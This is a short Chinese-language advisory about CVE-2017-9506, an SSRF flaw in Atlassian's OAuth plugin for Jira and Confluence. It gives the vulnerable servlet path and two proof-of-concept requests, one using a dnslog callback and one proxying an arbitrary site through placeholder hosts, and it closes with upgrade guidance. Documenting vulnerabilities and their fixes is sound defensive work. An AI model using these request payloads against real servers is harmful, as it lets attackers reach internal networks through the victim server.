漏洞详情
参考地址:
https://www.cve.org/CVERecord?id=CVE-2017-9506
漏洞URI: /plugins/servlet/oauth/users/icon-uri?consumerUri=xxx
漏洞版本: atlassian-oauth-service-provider-plugin的版本对于2.0.4
产品范围:此漏洞为atlassian产品的jar版本问题,只要是处于以上版本的产品均有风险,如wiki/jira
POC1
使用dnslog,如下图,在末尾处添加dnslog地址后访问,即可查询出相关的记录
公共dnslog服务:http://www.dnslog.cn/
POC2
直接添加任意地址,可以访问到此站点,如下:
https://wiki.xxx.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.baidu.com
https://jira.xxx.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.baidu.com
结果会访问到相关的地址的内容,等于是做了一层代理
解决
此问题已经较早,有成熟的解决方案,升级相关的产品版本解决。但如果不想升级整个产品版本,则可以只升级相关的jar包
参考文档
https://jira.atlassian.com/browse/CONFSERVER-53362?attachmentSortBy=dateTime
https://confluence.atlassian.com/confkb/how-to-clear-confluence-plugins-cache-297664846.html
评论